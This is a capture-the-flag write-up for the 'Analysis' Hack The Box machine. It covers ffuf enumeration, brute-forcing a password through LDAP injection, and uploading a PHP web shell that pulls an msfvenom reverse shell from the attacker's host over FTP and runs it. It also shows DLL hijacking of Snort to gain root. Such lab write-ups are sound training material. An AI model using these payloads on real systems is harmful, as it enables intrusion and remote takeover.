User flag#
Analysis.htb
I started by enumerating the VHosts on the webserver as there was no obvious vulnerability on the website:
1
| ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://analysis.htb/ -H "Host: FUZZ.analysis.htb"
|
The only result should be internal.analysis.htb
so let’s fuzz more:
1
| ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://internal.analysis.htb/FUZZ
|
After extensive fuzzing, I discovered a PHP file which is interesting:
1
| ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://internal.analysis.htb/users/FUZZ.php
|
By now, we have a file named list.php that requires a parameter. To tackle this, we’ll once again use ffuf to bruteforce the parameter name.
1
| ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://internal.analysis.htb/users/list.php?FUZZ=dong -fs 17
|
The parameter we searched is called name
and seems to be part of an LDAP query, use * to see everything.
After some research and reading about LDAP injection on Hacktricks, I used ffuf to bruteforce the users’ password.
1
2
3
4
5
6
7
| # start with this and look for valid characters with the size of 418
ffuf -w /usr/share/wordlists/seclists/Fuzzing/alphanum-case-extra.txt -u 'http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=FUZZ*)' -fs 406
# append the valid character in front of the FUZZ until you got the password
ffuf -w /usr/share/wordlists/seclists/Fuzzing/alphanum-case-extra.txt -u 'http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=9FUZZ*)' -fs 406
ffuf -w /usr/share/wordlists/seclists/Fuzzing/alphanum-case-extra.txt -u 'http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description=97FUZZ*)' -fs 406
|
🔍 Hint: The password contains a ‘*’, insert it when no other character is found with a size of 418.
Earlier we found a route called /employees
, maybe there is some sort of login there.
1
| ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files.txt -u http://internal.analysis.htb/employees/FUZZ.php
|
Indeed there is a login.php
that we can log in using the gathered credentials and are presented with a shady file upload.
I generated a msfvenom reverse shell and a PHP file that downloads it to the machine using cmd.exe over FTP and runs it.
1
| msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.88 LPORT=4711 -f exe -o /usr/share/tools/tmp/71973864.exe
|
1
| <?php system('cmd.exe /c "@echo open 10.10.14.88 21>gztxpuci.txt&@echo binary>>gztxpuci.txt&@echo GET tmp/71973864.exe >>gztxpuci.txt&@echo quit>>gztxpuci.txt&@ftp -A -s:gztxpuci.txt -v -i&del gztxpuci.txt&71973864.exe"'); ?>
|
🔍 Hint: msfvenom command and shell are generated using my PentestServerSuite which made this process really easy.
The only thing left to do is finding the uploads folder. To do this I once again used ffuf.
1
| ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://internal.analysis.htb/dashboard/FUZZ
|
It did find the uploads
folder and of course my PHP file was in it. Run the PHP file and the shell popped.
Root flag#
First thing I did is run winpeas and it did find something in snort where we could place a malicious DLL file.
Read through the snort config files and we find a DLL file that gets loaded by snort.
1
2
| msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.88 LPORT=4713 -f dll -o /usr/share/tools/tmp/14904932.dll
# upload it to -> C:\Snort\lib\snort_dynamicpreprocessor\sf_engine.dll
|
The box was not too hard and entertained me quite well although the root part was a bit easy.